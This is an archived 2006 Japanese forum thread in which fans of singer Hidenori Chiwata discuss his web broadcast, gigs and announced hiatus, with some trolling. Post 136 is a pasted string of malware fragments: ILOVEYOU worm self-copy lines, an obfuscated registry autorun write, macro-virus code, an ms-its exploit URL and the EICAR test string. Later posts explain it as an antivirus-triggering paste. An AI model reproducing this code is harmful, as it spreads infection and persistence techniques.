2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

千綿ヒデノリ

1 :NO MUSIC NO NAME:2006/05/16(火) 07:44:22 ID:tLVIGsUd
▼公式HP
ttp://www.chiwata.net

▼レギュラー番組
あっとおどろく放送局 ttp://odoroku.tv
毎週水曜22時〜 心の旅ブロードバンド放送

▼ショートフィルム出演
ttp://www.bookcafe.jp/nagasawa/shortfilm.html
長澤雅彦監督、相武紗季主演《Short Cakes》


2 :NO MUSIC NO NAME:2006/05/16(火) 11:05:10 ID:8SzPNA6+


3 :NO MUSIC NO NAME:2006/05/16(火) 12:15:25 ID:r0aEPLMf


4 :NO MUSIC NO NAME:2006/05/16(火) 15:07:32 ID:AaS7z0ws
夜空の星が好きだ。

5 :NO MUSIC NO NAME:2006/05/16(火) 17:27:04 ID:OdRwLITO
こいつってジャケットとか尾崎豊を意識してない?
何かマネしてるだけっぽいあと浜省とか聴いてそう


6 :終了:2006/05/17(水) 16:48:09 ID:LvdLzq9t
>>1
いい加減諦めて巣に帰れよ

【春も勝負】千綿ヒデノリ 第七幕【押忍!】
http://music4.2ch.net/test/read.cgi/minor/1144245126/

7 :NO MUSIC NO NAME:2006/05/18(木) 04:40:33 ID:pJ+BbNt+
馬鹿じゃねーの。クソ自治厨が。
荒らしたのおまえか。

8 :NO MUSIC NO NAME:2006/05/18(木) 17:13:05 ID:N5TtslPR
ごんのすけ必死だなw

9 :NO MUSIC NO NAME:2006/05/18(木) 23:47:30 ID:+QjofFG9
何が必死なの?あれからオフィに来てないじゃん??

ここ復活させたの、最初のスレ立て主さん?誰にしてもお疲れさまです。
昨夜の心の旅も生唄アリ。「6月はライブ少ないから・・・。」って、
6月までは生唄月間にしてくれるのかな?

10 :NO MUSIC NO NAME:2006/05/19(金) 07:00:43 ID:jBUcXhO2
テスト

11 :NO MUSIC NO NAME:2006/05/19(金) 22:21:35 ID:RSQd9kam
こちらはごんのすけ以外パピコ禁止

12 :NOMUSIC NO NAME:2006/05/20(土) 10:01:38 ID:IdzGhCuW
ファン叩きしたいならあちらに帰ってね

13 :NO MUSIC NO NAME:2006/05/20(土) 11:38:13 ID:Nbcpr05H
こちらはごんのすけ以外パピコ禁止

14 :NO MUSIC NO NAME:2006/05/20(土) 11:48:49 ID:qDs098RZ
ライブ情報はまた九州。関東関西も決まってるのに、
他の地域はまだ未定か・・・orz

15 :NO MUSIC NO NAME:2006/05/20(土) 12:24:28 ID:Nbcpr05H
こちらはごんのすけ以外パピコ禁止

16 :NO MUSIC NO NAME:2006/05/22(月) 01:40:20 ID:YFl9BIxb
なあに?最初にソロ板が立った時に応援してた人達
いなくなっちゃったの?

17 :NO MUSIC NO NAME:2006/05/22(月) 07:34:32 ID:n7VbEG/p
ネタが無いから大人しくしてるだけだとオモ。粘着もいるし
あんたも無理にカキコしないでネタが出るのを待った方がいいよ。
荒らしや煽りは放置が基本。くれぐれも大人の対応で。

18 :NO MUSIC NO NAME:2006/05/22(月) 12:37:52 ID:MuJY2FkC
こちらはごんのすけ以外パピコ禁止

19 :NO MUSIC NO NAME:2006/05/23(火) 20:47:52 ID:Il/tXPrN
復活ありがとう。気づいてなかった〜。
ネタなくてライブもなくて淋しいね。
メッセージの更新は当分なさそうだし…。

20 :NO MUSIC NO NAME:2006/05/23(火) 21:42:49 ID:Cs/2KGkW
こちらはごんのすけ以外パピコ禁止

21 :NO MUSIC NO NAME:2006/05/23(火) 22:08:44 ID:5HBF/zW6
ホントの彼女だったらそんな目立つ行動はしないと思うんだけど。


22 :NO MUSIC NO NAME:2006/05/23(火) 22:52:14 ID:Cs/2KGkW
こちらはごんのすけ以外パピコ禁止

23 :NO MUSIC NO NAME:2006/05/23(火) 23:19:13 ID:LVUqPs7c
>19
自分も気付くのに時間かかった。前スレが荒らしのせいで書き込み不能に
なったようだから、ソロ板一覧を見たら誰か立て直してくれたのが判明。
前スレ消えたし、19さんのようにここに気付く人が増えるといいね。


24 :NO MUSIC NO NAME:2006/05/24(水) 02:17:15 ID:5bAs+r4v
こちらはごんのすけ以外パピコ禁止

25 :NO MUSIC NO NAME:2006/05/24(水) 04:00:41 ID:5FH4MDEQ
>21
ライブならともかくクルパじゃ会員じゃないとチケット取れないからかも?

お気に入りの花柄シャツ誕プレだったのかな〜?
もちろん根拠なしだけど。
なんかクルパの時、お披露目的に感じたのね。
着てるよ〜って、もらった人にアピってる感じがしたから。
くれた人が来てるのかな〜って思ってたから、納得してしまった?

26 :NO MUSIC NO NAME:2006/05/24(水) 06:10:12 ID:LaudJfy2
>25
彼女だったらクルパに行く必要もないのでわ?

27 :NO MUSIC NO NAME:2006/05/24(水) 11:27:13 ID:5bAs+r4v
こちらはごんのすけ以外パピコ禁止

28 :NO MUSIC NO NAME:2006/05/24(水) 11:48:33 ID:5FH4MDEQ
>26
ごめんごめんw
当事者に確認しないと分からないことに対して不毛だよね。
と、自分で自分に突っ込んでしまったw

29 :NO MUSIC NO NAME:2006/05/24(水) 12:06:46 ID:OYL+dysS
>28
謝る必要ないよ〜。
思ってること吐き出す場だし。
ファンだからあーでもないこーでもないって思うもんだもん。

30 :NO MUSIC NO NAME:2006/05/24(水) 12:34:41 ID:5bAs+r4v
こちらはごんのすけ以外パピコ禁止

31 :NO MUSIC NO NAME:2006/05/24(水) 21:49:23 ID:5FH4MDEQ
>29
あたたかいお言葉ありがとう!

32 :NO MUSIC NO NAME:2006/05/25(木) 02:01:40 ID:/lJgX5zS
心の旅あったのに静かだね。
ところで東京クルパで立見してたパスつき美人についての詳細は?
スタッフや関係者じゃなかったの?

33 :NO MUSIC NO NAME:2006/05/25(木) 02:46:08 ID:fDJ02JZ/
こちらはごんのすけ以外パピコ禁止

34 :NO MUSIC NO NAME:2006/05/25(木) 06:34:31 ID:bl/5vNiC
心の旅は久しぶりに元気だったね?
「カサブタ」とかもテンプレにいるのかな?「金色のガッシュベル」主題歌とか?
公式にCHASEだったことって書いてないんだよね。
PROFILEもBIOGRAPHY(←2003で止まってるw)もソロになってからだけ〜。

35 :NO MUSIC NO NAME:2006/05/25(木) 11:13:40 ID:K5ALngQv
こちらはごんのすけ以外パピコ禁止

36 :NO MUSIC NO NAME:2006/05/25(木) 23:04:55 ID:qdJ6QBS/
心の旅、本当に生唄月間になりそうだね。来週も何か唄ってくれるのかな。
雨に濡れるのが嫌いだなんて、「rain」はそんな想いから生まれた
曲だったのか・・・w


37 :NO MUSIC NO NAME:2006/05/26(金) 22:12:42 ID:sqj3xL+M
ファンは雨に濡れること多いのにね。

38 :NO MUSIC NO NAME:2006/05/26(金) 22:53:55 ID:A5r1/STp
ニューブリとラクーアは濡れたね〜。
佐賀の花火は晴れるといいね。

39 :NO MUSIC NO NAME:2006/05/27(土) 02:13:07 ID:Dhq2GeJa
佐賀は7月だから、うまく梅雨明けしてくれれば
あとは心配するのは台風だけ。晴れ男だし大丈夫かな?


40 :NO MUSIC NO NAME:2006/05/27(土) 22:44:59 ID:quh+7hIJ
古湯の前後は何もなし?

41 :NO MUSIC NO NAME:2006/05/27(土) 22:54:51 ID:48HVUByg
古湯のおっさんが飛行機手配したと書いてた
なのでないだろう

42 :NO MUSIC NO NAME:2006/05/27(土) 23:03:23 ID:quh+7hIJ
>41
ありがとう。そっかないのかぁ、、、残念。
古湯いいLIVEだといいなぁ。

43 :NO MUSIC NO NAME:2006/05/27(土) 23:03:56 ID:PJTGbU4y
夏といえば、全力投球には出ないのだろうか?
今の所は名前がない…。

44 :NO MUSIC NO NAME:2006/05/29(月) 00:51:58 ID:VOeXZPR/
>43
ホントだ、今月の唄会で共演したナオト・インティライミは
出ているのにね。残念…。

http://www.diskgarage.com/play/00053366.html

45 :NO MUSIC NO NAME:2006/05/29(月) 02:41:53 ID:/1k1Ph/D
>44
他に予定があるんならうれしいけどね。

46 :NO MUSIC NO NAME:2006/05/30(火) 23:59:20 ID:1ZXvGqo1
6/25(日)の唄会チケット1枚、ヤフオク出てるよ。
出品者の回し者じゃないけど、ゲットし損ねた人は参考までに。

http://page11.auctions.yahoo.co.jp/jp/auction/n40639586

47 :NO MUSIC NO NAME:2006/05/31(水) 22:31:18 ID:Jj0bhDrt
また追加があったのか、両日とも今ぴあに出てるよ。

48 :NO MUSIC NO NAME:2006/06/01(木) 00:55:42 ID:pMWYreym
一人でも多くの人が見れるといいね。

向こうの板のソロ板落ちてるって言い続けてる人見て思った。
ちょっと検索でもかけたら分かるのに、確かめないから…。
進行形で視野って狭くなるのね〜って思った。
いや、見つかっては欲しくないんだけどねw

49 :NO MUSIC NO NAME:2006/06/01(木) 01:11:34 ID:8OEywtcA
>48
性格悪いな、お前。

50 :NO MUSIC NO NAME:2006/06/01(木) 01:27:04 ID:nKtIeWBf
例えこのスレが削除されても立て続けるから!
絶対に根性ババ色のスクツのインディーズ板ではやりたくない

51 :NO MUSIC NO NAME:2006/06/01(木) 01:29:44 ID:nKtIeWBf
千綿君は十分メジャーだからソロ板でも何らおかしくないよ。

52 :NO MUSIC NO NAME:2006/06/01(木) 01:31:38 ID:nKtIeWBf
2chでもちゃんと語り合える場所があるって事、千綿君やその周辺、
そして全てのファンにも分かってもらうためのスレだから。

53 :NO MUSIC NO NAME:2006/06/01(木) 01:38:00 ID:nKtIeWBf
馴れ合ったっていいじゃない。
喧嘩腰にしか語り合えない下品な人達よりよほど素晴らしいと思うけど。

54 :NO MUSIC NO NAME:2006/06/01(木) 01:40:17 ID:j7Z+tDpO
>52
2chを正当化して語りの場しようとしているが所詮2ch
千綿やスタッフが見ていると思う
しかしここでどれだけ正論を吐いても認めてもらえない
やはり意見として受けとってもらうにはオフィで書くべき

55 :NO MUSIC NO NAME:2006/06/01(木) 01:45:17 ID:8OEywtcA
ID:nKtIeWBf マジでキモイなお前。

メジャーとインディーズの区別もつかないまま
ルール違反のスレ立てを続ける
ただの自己中の自己満足じゃん

千綿やその周辺、全てのファンのため?
片腹痛い
むしろ迷惑だろ。

つーか本気でそう思ってるなら
オフィのBBSにここのアド貼って宣伝してくれば?
ごんのすけみたいにさ。

56 :NO MUSIC NO NAME:2006/06/01(木) 07:33:02 ID:OUvuq794
>>54>>55
うぜえからもうくんなよwwwww

57 :NO MUSIC NO NAME:2006/06/01(木) 08:50:50 ID:MYmZV0io
厨房専用スレは此処ですか?

58 :NO MUSIC NO NAME:2006/06/01(木) 11:21:37 ID:yMtnb52k
>57
厨房っていうか、まともな思考回路を失った哀れなキモオバ&キモオッサンのスクツです。

59 :NO MUSIC NO NAME:2006/06/01(木) 11:29:13 ID:9JNfee/c
千綿がカワイソス(´・ω・`)
こんなスレ早くなくなっちまえ(・∀・)

60 :NO MUSIC NO NAME:2006/06/01(木) 11:47:09 ID:pMWYreym
2ちゃんイメージはトリセツちょっと読んだら少し変わった。
使い方間違えてるの「2ちゃんだから」って言ってる人達じゃない?

61 :NO MUSIC NO NAME:2006/06/01(木) 13:47:43 ID:8uyztPXt
こちらはごんのすけ以外パピコ禁止

62 :NO MUSIC NO NAME:2006/06/01(木) 15:06:59 ID:7R49opfu
>>59
馬ー鹿

63 :NO MUSIC NO NAME:2006/06/01(木) 15:41:04 ID:yMtnb52k
>59
烈しく同意

64 :NO MUSIC NO NAME:2006/06/01(木) 16:07:03 ID:3rYJjxku
顔文字使うオバサンてキモッ。


65 :NO MUSIC NO NAME:2006/06/01(木) 17:02:28 ID:8uyztPXt
こちらはごんのすけ以外パピコ禁止

66 :NO MUSIC NO NAME:2006/06/01(木) 20:33:04 ID:MOCVYr9C
あちらの板を刺激するような発言は慎まないと。粘着は復活するし
好戦的なのを呼び込んでるし・・・。しばらく潜伏しとくか。

67 :NO MUSIC NO NAME:2006/06/01(木) 21:32:43 ID:yMtnb52k
↑自分達こそ粘着キモオタだってことに早く気付いておくれ


68 :NO MUSIC NO NAME:2006/06/01(木) 21:55:35 ID:8uyztPXt
こちらはごんのすけ以外パピコ禁止

69 :NO MUSIC NO NAME:2006/06/02(金) 23:34:41 ID:ZsNsu35R
明日は古湯だね。自分は行けないから、代わりに心の旅の
再放送でも見るかな。明日の再放送分は「あなたに逢いにいこう」
の生歌やってくれた回だったっけ?

70 :NO MUSIC NO NAME:2006/06/03(土) 00:21:01 ID:JNf3Dgtd
明日は5/17分の再放送だからフェードアウト?替え歌ver.の「ゆりかご」だよ。
すごい楽しそうに歌詞をかえてたやつw
来週の再放送が「あなたに逢いにいこう」だよ。
最近は生唄があるから再放送も要チェックだね。

71 :NO MUSIC NO NAME:2006/06/03(土) 15:12:18 ID:yBkkdMCJ
>70
そうでした、ありがとう。生唄のおかげで再放送が楽しみです。
次回の本放送は古湯の土産話でもしてくれるかな?こちらも楽しみ。

72 :NO MUSIC NO NAME:2006/06/05(月) 20:53:20 ID:JD0ca5hn
6/25唄会チケ探してる人、724ブログ覗いてごらん

73 :NO MUSIC NO NAME:2006/06/06(火) 00:17:24 ID:0wveYmzJ
724ブログって何ですか?無知ですみません。

74 :NO MUSIC NO NAME:2006/06/06(火) 01:15:41 ID:rY3OOHPJ
なつよ これでわからないなら行く資格なし

75 :NO MUSIC NO NAME:2006/06/06(火) 07:01:00 ID:YCULJF8N
>74

ありがとうございます。解ったけど、「私、まだ持ってます」って
チケ欲しい人は本人にメールちょうだいと言う事なのか?

76 :NO MUSIC NO NAME:2006/06/07(水) 15:45:53 ID:W6k7omtv
今夜は何を歌うかな?

77 :NO MUSIC NO NAME:2006/06/07(水) 21:01:30 ID:dAoSGyPJ
生唄楽しみだね〜。
日焼け具合はどうなってるかな?

78 :NO MUSIC NO NAME:2006/06/07(水) 22:38:36 ID:CX8e88kX
え〜〜!!「心の旅」終わっちゃうの〜〜〜!!!
ラジオ収録だけであって、ブロードバンドは続けてくれるのか??
いきなりの終了。最終回の予告は一ヶ月くらい前からにして欲しかったな。
心の準備が・・・。

79 :NO MUSIC NO NAME:2006/06/07(水) 22:54:37 ID:dAoSGyPJ
だからメッセージ更新なかったのかも…。
一番さみしいの千綿だろうし…。

80 :NO MUSIC NO NAME:2006/06/07(水) 22:58:45 ID:Cc8DAY5S
来月から心の族が始まります

81 :NO MUSIC NO NAME:2006/06/07(水) 23:21:59 ID:BSw77eIH
>78
「ブロードバンド放送はもうちょっと続くんですけど」
それくらいのことちゃんと聞き取れよ

82 :NO MUSIC NO NAME:2006/06/08(木) 18:26:35 ID:05gPGHr8
向こうで千綿引退って騒がれてるけど…ほんと?

83 :NO MUSIC NO NAME:2006/06/08(木) 21:46:16 ID:K0uYHLoG
ここで質問してもだれも真相は答えられないんじゃ?
個人的にはありえないって思うけど。
あっちの板では何でそんな話になってんの?

84 :NO MUSIC NO NAME:2006/06/08(木) 22:13:32 ID:/7Z3wCYi
・ライブが8月以降は全く入らず、新たな情報も無い
・千綿メッセ&マネダイがなかなか更新されない
・「心の旅」が終了する

これらが心配要因になって、あちらでは引退疑惑が持ち上がっている様子。
真相はどうあれ、ファンはただcocoroからの情報を待つしかない。

85 :NO MUSIC NO NAME:2006/06/08(木) 23:29:52 ID:/7Z3wCYi
>80
千綿がバイクふかして佐賀を疾走するの?w

86 :NO MUSIC NO NAME:2006/06/09(金) 08:40:02 ID:WnpZK+Qh
>85
暗めの話題が多い中、朝から爆笑させていただきました。

「心の族」終了後は、「心の旗」へ
CHロゴをバイクに立ててリーゼントで全国爆走!

87 :NO MUSIC NO NAME:2006/06/09(金) 13:56:28 ID:RqTRJUIN
それのどこが面白いの?

88 :NO MUSIC NO NAME:2006/06/09(金) 21:24:57 ID:pkswZrhE
千綿が総長、はなわが副長wこのネタ引っ張りすぎ?
話題が無くてヒマなもので・・・

89 :NO MUSIC NO NAME:2006/06/10(土) 00:57:41 ID:i2XMMv6m
さすがにもう面白くないけど、あせってカキコするなや
まったり行こう

90 :NO MUSIC NO NAME:2006/06/10(土) 09:39:47 ID:th+6N93I
心の旅の再放送も見逃せなくなってます。
お楽しみの生唄は今日は「あなたに逢いにいこう」だ!
唄会も楽しみだけどワンマンがやっぱりいいな。
大阪ワンマン楽しみだな〜。


91 :NO MUSIC NO NAME:2006/06/10(土) 11:53:14 ID:mxAW6gxN
「心の旅」午前の再放送終了。この日の生唄は時間が無いせいで
短かったな〜。夜の再放送は家族がPC使うので見られない・・・
来週は「それが僕にできること」

大阪ワンマンいいな〜。私は今月の唄会だから、ワンマンじゃないんだな。
初日と二日目でセットリストは総入れ替えしてくれるかな?

92 :NO MUSIC NO NAME:2006/06/11(日) 23:04:18 ID:KnJjgitu
「それが僕に出来ること」めちゃめちゃ良かったよね〜!
長かったし、聴き応え充分!
今週の「汚れたシャツを着て」も良かった〜!

セットリスト総入れ替えだったらいいね〜。
何曲位あるんだろうなぁ?楽しみだね。

93 :NO MUSIC NO NAME:2006/06/14(水) 18:30:53 ID:dydu7JVC
千綿引退するんだね。メッセ更新されたよ。

94 :NO MUSIC NO NAME:2006/06/14(水) 19:48:16 ID:3Q5/k270
引退っていうとニュアンス違うと思うが。

95 :NO MUSIC NO NAME:2006/06/14(水) 22:50:30 ID:NqPkZzuO
何一つリアルに感じられない
Cocooの「焼け野が原」が頭をリピート中
助けてくれ・・・
冷静になれない状態でのカキコ、勘弁してくれ。

96 :NO MUSIC NO NAME:2006/06/14(水) 22:57:52 ID:3Q5/k270
もっといい唄唄えるようになって帰ってくるって
本人が言ってるんだからファンなら信じて待てよ。

こんなところで助けてくれなんて言ったって
仕方がないだろう?

97 :NO MUSIC NO NAME:2006/06/14(水) 23:11:42 ID:ZZrgsUGR
>>95
同じく焼け野が原がぐるぐる回ってるよ。
でも、Coccoはすぐ帰ってきたよ。
千綿も帰ってくるよ。

98 :NO MUSIC NO NAME:2006/06/15(木) 21:58:00 ID:dAs2fRsC
>97
そうだね。焼け野に緑が芽吹くまで待とうか。
ありがとう。

99 :NO MUSIC NO NAME:2006/06/17(土) 11:49:25 ID:vwRRv5KG
ひとまず午前の再放送終了。この回の「それが僕にできること」は
四万十パワーが力を与えてくれたのかな?良かった・・・。

ところで、最終幕行く?

100 :NO MUSIC NO NAME:2006/06/17(土) 17:24:44 ID:PDg7ca3P
>99
え、行かないの?

101 :NO MUSIC NO NAME:2006/06/17(土) 21:10:46 ID:vwRRv5KG
もちろん行くよ。ただ、いきなり一ヶ月前になって発表されたから
遠方の人は痛いだろうなあって思った。西日本の人も、活動休止が
わかっていれば、AXいけない場合はBIG CATに何が何でも行こうと
動けたのに。スケジュール簡単に変えられない人は気の毒。


102 :NO MUSIC NO NAME:2006/06/17(土) 21:24:24 ID:3izO4HZE
>101
やさしい人だね。

103 :NO MUSIC NO NAME:2006/06/17(土) 22:28:40 ID:PFP6Lvqw
>101
偽善者だね
HISAKOみたい プゲラ

104 :NO MUSIC NO NAME:2006/06/17(土) 22:49:50 ID:lKhOafTE
103みたいにとるのがいるからな…。こわいよな。
言いづらいことほどこそ、言われる側は早く聞きたいんだよな。
ギリギリにしか言えないのは、自分が言えないからだけで相手の立場には立ってない。
気持ちは分かるけど、もっと早く発表して欲しかったというのは正直ある。

105 :NO MUSIC NO NAME:2006/06/17(土) 23:20:32 ID:PFP6Lvqw
>104
それこそ、ファンの立場からの勝手な意見じゃん

なんでこのスレの奴らって、気持ち悪い馴れ合い続けるの?
揃いも揃って表面だけ取り繕った偽善者のくせに

106 :NO MUSIC NO NAME:2006/06/18(日) 00:03:06 ID:lKhOafTE
>105
悪い報告ほど迅速には仕事でも鉄則。

関係諸機関に配慮してのことだろうし。
あちらを立てれば、こちらが立たずというのも分かった上でのぼやきだよ。

あなたと違う価値観で生きている人間も世の中にはたくさんいるんだよ。

107 :NO MUSIC NO NAME:2006/06/18(日) 00:07:26 ID:MnCCu+Id
>106
そうね、いい人ぶって自分の汚い本性隠して
世渡りするのが吉という価値観を持った人!
素敵だね〜


108 :NO MUSIC NO NAME:2006/06/18(日) 00:56:01 ID:liqohHCD
二度目の再放送終了。再放送で見られるのも。もうすぐ終わりなんだな・・・

109 :NO MUSIC NO NAME:2006/06/18(日) 23:57:37 ID:Cxze7HnO
心の旅まで○日というわくわくが無くなって空しい…。

110 :NO MUSIC NO NAME:2006/06/19(月) 21:34:00 ID:JpAQcTHw
違う価値観で生きている人間=ファンの立場からの勝手な意見

111 :NO MUSIC NO NAME:2006/06/19(月) 21:45:14 ID:SQDM9rvr
FABがいよいよだね。
どんな構成なんだろうな。楽しみ。

112 :NO MUSIC NO NAME:2006/06/26(月) 23:28:59 ID:b9nMSJ4J
静かだね。FAB行った人いないの?お〜い・・・

113 :NO MUSIC NO NAME:2006/06/27(火) 04:22:04 ID:jMNBYwwb
お〜い…

114 :NO MUSIC NO NAME:2006/06/27(火) 08:38:57 ID:yP6SmXot
FM佐賀も終わっちゃった。FAB良かったみたいで安心した。
玄海のあとは本当に何もないのかなぁ…どこかでフラーッと唄っていたり
しないのかなぁ

115 :NO MUSIC NO NAME:2006/06/27(火) 10:56:16 ID:fsBjyMY1
佐賀の路上で、アマに混じってライブやってたりして。
さすがにそれを確かめるために佐賀に飛ぶ気は無いが…

116 :NO MUSIC NO NAME:2006/06/27(火) 22:51:02 ID:R/pIAETF
mixiの千綿コミュで「年内休んで、年明けに復帰」
みたいなことを書いてる人がいたけど
あれは何を根拠に言っているんだろう・・・

117 :NO MUSIC NO NAME:2006/06/27(火) 23:04:45 ID:9m/iZxTK
へ〜、そんな噂あったんだ。単なる希望的観測じゃない?
mixiは友達から勧められたけど、未だに登録していない。
千綿コミュどう?2ちゃんや公式とあまり変わらない?


118 :NO MUSIC NO NAME:2006/06/27(火) 23:13:20 ID:R/pIAETF
2chとも公式とも違う雰囲気
というか、結構過疎コミュだと思う

119 :NO MUSIC NO NAME:2006/06/27(火) 23:43:08 ID:IGSGHWH4
今後の予定どうなってるんだろうね…早く知りたいね。
千綿コミュのそのネタ前後の話とか書いた人とか信憑性はどんな感じ?

FAB見た感じだと、活動休止になるって信じられない…。
明日が心の旅の最終回だね。


120 :NO MUSIC NO NAME:2006/06/28(水) 09:02:31 ID:avEldcdv
FAB行ったんだ。羨ましい。笑顔一杯だったみたいだね。
自分は7月22日まで行けない。心の旅が終わるのが本当に残念。
今日はどんな映像だろう?
佐賀の路上にでも、情報があれば行っちゃうなぁ。隣の県だし…

121 :NO MUSIC NO NAME:2006/06/28(水) 09:54:22 ID:lJ+AjbCq
FABはやっぱりイベント唄会の最後だから切なそうだったよ。
でも、唄はいつもと変わらず魂こもった唄を届けてくれたよ。
新曲がめちゃめちゃ良かった!せめて歌詞を覚えておきたい!知りたいー!
心の旅は生唄聴けたらいいな〜。
佐賀に帰っちゃうのかな…。

122 :NO MUSIC NO NAME:2006/06/28(水) 15:27:32 ID:wBbq43rj
今日の心の旅って、いままでの総集編だから生歌はないのでは・・。


って、先週の放送(総集編)見てないんで確信はもてないけれど。

123 :NO MUSIC NO NAME:2006/06/28(水) 16:15:32 ID:xvzho4mB
最終幕、全席自由席というのは立ち見なんでしょうか。

124 :NO MUSIC NO NAME:2006/06/28(水) 16:40:12 ID:Cu+uHs/p
>122
ごめんごめん。正確に言うと生唄のVTRだね。長崎のホンシャン銀行とか良かったんだよね〜。
とりあえず、先週放送し損ねた「祈り」の生唄VTRは流してくれるらしい。
どう違うのか言ってなかったけど、歌詞が違うとこあるらしいので要チェックかも?


125 :NO MUSIC NO NAME:2006/06/28(水) 23:04:34 ID:rZCkbJhz
>121
>新曲がめちゃめちゃ良かった!せめて歌詞を覚えておきたい!知りたいー!

サビのメロディーと歌詞はどうにか覚えた。でも正確かは自信ないし
著作権の事もあるのでここには書けない。スマンです。

公式でもあやさんがFABレポ書いていたけど、アンコールセッションの
「幸せなら手をたたこう」の詳細はあえて避けたみたい。「♪手をたたこう」
をヴァージョンを変えて一人一人廻していく事なったんだけど、眼鏡や肩は
ともかく、しまいには「♪幸せなら胸揉もう(石野田奈津代)」とか
「♪幸せならあそこたたこう(サムエルの誰か忘れた… )」なんて下ネタ
ヴァージョンまで炸裂していた……

126 :NO MUSIC NO NAME:2006/06/28(水) 23:16:20 ID:WA+xpB3K
>125
私は121ではないけど

ここには書く気がないのならそもそも
「覚えた」って宣言する必要ないのでは?

それじゃむしろ嫌がらせですよ

127 :NO MUSIC NO NAME:2006/06/28(水) 23:25:59 ID:rZCkbJhz
>126
それもごもっとも。気が利かないで失礼しました…。

128 :121:2006/06/29(木) 00:08:33 ID:oc7J6AF3
>125
どうにかしたいが、どうにもできないとういう気持ちはわかるので、ありがとう。
ここに歌詞を書いたらエライ事になるのは理解できるので大丈夫。
覚えられる記憶力がうらやましい。
日常でいろんな音にさらされているとメロディとか思い出せなくなってくるんだな…。
脳みそのシワが足りないらしいw
でも、すんなりメロディと歌詞が入ってくる千綿の唄はすごいよね。
いつか誰が聞いても1回で覚えられるような唄が誕生するのが楽しみだ。

129 :121:2006/06/29(木) 00:17:46 ID:oc7J6AF3
>125
どれもアクション付きだったけど
下ネタバージョンは、まちゃみのようで受けたw
本当にするんだもんな〜しかも楽しそうw

130 :NO MUSIC NO NAME:2006/06/30(金) 13:35:11 ID:c/rfJY5P
>125
楽しそうな様子が浮かびました。表と違ってこんな話が聞けて
良かったです。見れた人いいなぁ。

今日でマネ氏がcocoroを離れますね。
実質、業務は少しずつ千綿に渡していたのでしょうが、
やっぱりライブに行けば、いつも側にいた人がいなくなるのは
何だかぽっかり空いたような気分になります。
こんな所読んでないだろうけど、お疲れ様でした。そしてありがとう。
私が千綿を好きになったのは、あのインストアで逢えたから。

131 :NO MUSIC NO NAME:2006/06/30(金) 20:43:10 ID:8oAHRkYj
実際にはマネと別れただけだったのでは?と思う。


132 :NO MUSIC NO NAME:2006/06/30(金) 22:42:13 ID:XumSoKBi
じゃ、すぐ活動再開かーって思うけど
>131
みたいに書いちゃうとできないよ バカ

133 :NO MUSIC NO NAME:2006/06/30(金) 23:46:21 ID:+kMw6SrN
FABは25日の方が楽しかったです。石野田奈津代やサムエルの面白ぶりが
一層盛り上げてくれた感じ。アンコールセッションでキャンプの話題に
なった時、

(千綿)「なっちゃん誘ったら、キャンプなのにギター持ってきて
     一日中弾いてるんだもん。(笑)」

(石野田)「ちわちゃんだって、あの時ペットボトルにお米入れて
      シャカシャカってやってたよね。(笑)それしか覚えて
      いない…。」

なんてトークもしてました。二人でアウトドアセッションやってたのかw

134 :NO MUSIC NO NAME:2006/07/01(土) 00:48:10 ID:Hau8mFaW
そのトークでポイントだったのは、お互い相手のことは「○○だった!」って覚えていて
自分のことを覚えていなかった所だwサムエルに突っ込まれてたw
ミュージシャンってアウトドア好きだったりすること多いね〜。
以前、人が人を呼んで結構な人数でバーベキューしたとか言ってたね〜?

135 :NO MUSIC NO NAME:2006/07/02(日) 22:02:11 ID:5Yzs7nGr
キャンプ話ってガイシュツだよね?
初めて聞いたの?

136 :NO MUSIC NO NAME:2006/07/02(日) 22:04:30 ID:WZrvAuwK
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

137 :NO MUSIC NO NAME:2006/07/04(火) 10:53:30 ID:wGGb8jq+
ここもウイルス貼り付けられたね。他の邦楽スレも被害に遭ってるみたい。

138 :NO MUSIC NO NAME:2006/07/06(木) 14:32:06 ID:3fpSWeWR
シリア語ブラクラたのし〜☆

139 :NO MUSIC NO NAME:2006/07/06(木) 15:28:00 ID:9HhAEoGd
他スレからの引用ですが、>>136の様なノートン先生が誤反応を起こす文字列については、
以下のリンク先に対処方法が書かれていますので参考までにお読みください。
 http://ansitu.xrea.jp/guidance/?FAQ2#k863b492 (特に「・参考」部分のリンク先)
 http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#content_1_20

ノートンの設定が上手くいきますと、以後、ノートンが誤反応を起こさなくなります。
1度設定するだけで、他のスレに書き込まれた同様の文字列にも反応しなくなるため、お奨めです。

ちとコピペさせていただきました。




140 :NO MUSIC NO NAME:2006/07/09(日) 20:14:04 ID:MRXzOnOV
